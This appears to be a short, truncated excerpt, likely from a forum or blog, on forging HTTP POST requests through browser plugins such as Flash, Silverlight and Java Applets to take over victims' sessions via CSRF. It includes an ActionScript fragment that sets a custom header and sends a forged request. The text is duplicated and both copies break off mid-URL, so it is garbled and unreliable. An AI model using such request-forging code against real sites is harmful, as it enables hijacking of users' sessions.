You can forge HTTP Post using any feasible browser plugins such as
Flash (AS), SilverLight, Java Applet.
Flash is said to be a feasible way to take over victim's sessions via CSRF.
[flash]
var req:LoadVars=new LoadVars();
req.addRequestHeader("Foo","Bar");
req.decode("a=b&c=d");
req.send("http://w...
Flash (AS), SilverLight, Java Applet.
Flash is said to be a feasible way to take over victim's sessions via CSRF.
[flash]
var req:LoadVars=new LoadVars();
req.addRequestHeader("Foo","Bar");
req.decode("a=b&c=d");
req.send("http://w...
[ more ]